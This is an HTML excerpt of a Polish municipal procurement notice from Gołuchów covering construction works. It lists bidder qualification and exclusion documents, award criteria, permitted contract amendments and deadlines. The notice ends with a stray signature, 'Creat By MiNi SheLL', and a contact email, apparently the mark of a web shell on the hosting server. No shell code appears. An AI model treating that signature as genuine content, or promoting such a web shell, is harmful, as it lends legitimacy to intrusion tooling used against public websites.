<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz ofertowy wg załącznik nr 1 do SIWZ
2) Do oferty załączyć ksero potwierdzenia wniesienia wadium (ksero potwierdzon za zgodność z oryginałem)
3) Formularz cenowy wg załącznik nr 8 do SIWZ
4) Harmonogram rzeczowo - finansowy wg załącznik nr 9 do SIWZ
5) Wykaz podwykonawców przewidzianych do wykonania zamówienia wg załącznik nr 11 do SIWZ
6) Pełnomocnictwo - upoważnienie (jeżeli konieczne)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie: 
1. Zmniejszenia zakresu przedmiotu zamówienia i wynagrodzenia pod warunkiem, 
że z niemożliwych do przewidzenia na etapie planowania inwestycji  okoliczności  wykonawca  nie wykona  pewnego  zakresu  robót  i   nie wpłynie to  na jakość  przedmiotu umowy.      
2. Zmiana terminu przewidzianego na zakończenie robót: 
a) wstrzymanie  realizacji robót spowodowanej z przyczyn leżących po stronie Zamawiającego, 
b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mającej bezpośredni wpływ na terminowość wykonania robót lub inne okoliczności niezależne od Wykonawcy, lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie,
c) warunków atmosferycznych uniemożliwiających realizację robót np. długotrwałe intensywne opady deszczu uniemożliwiające realizację robót itp. 
d) napotkanie na etapie budowy niewybuchów, zabytków itp.
e) konieczność wprowadzenia zmian w dokumentacji projektowej, 
f) wykopaliska uniemożliwiające wykonanie robót w ustalonym terminie,
Fakty, o których mowa w pkt. 2 lit. b), c), d), e) i f)  muszą być stwierdzone przez Inspektora Nadzoru, Kierownika Budowy i zatwierdzone przez Zamawiającego w sporządzonym 
na tę okoliczność protokole. Strony ustalą nowy termin z uwzględnieniem przerwy w realizacji robót. 
3. Zamawiający może dokonać zmiany postanowień zawartej umowy w przypadku, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub gdy zmiany te są korzystne dla zamawiającego.
4. Zamawiający dopuszcza w razie konieczności wykonanie świadczenia zamiennego (roboty zamienne), której wykonanie nie będzie wykraczało poza zakres określony w ofercie i nie zmieni wynagrodzenia wykonawcy. Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w dokumentacji projektowej a tym samym w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla zamawiającego i nie spowodują obniżenia parametrów tych materiałów lub urządzeń. Będą to, przykładowo, okoliczności:
a) powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatację 
i konserwację wykonanego przedmiotu umowy,
b) powodujące poprawienie parametrów technicznych,
c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
5. Zamawiający przewiduje możliwość dokonania zmiany w harmonogramie realizacji inwestycji w przypadku zmiany warunków finansowania lub zaistnienia innych niezależnych od niego czynników.
6. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami: 
a) zmiana powszechnie obowiązujących przepisów prawa w zakresie mających wpływ 
na realizację zamówienia, 
b) gdy zmianie ulegną zapisy umowy, przedmiotem której jest dofinansowanie tej inwestycji, w tym m.in. zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.goluchow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gołuchów, ul. Lipowa 1, 63-322 Gołuchów ( pok. 22 ) lub za zaliczeniem pocztowym ( koszt druku SIWZ 300 zł + koszty przesłania ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 12:00, miejsce: Urząd Gminy Gołuchów, ul. Lipowa 1, 63-322 Gołuchów
Pokój nr 16 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe usługi dla gospodarki ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com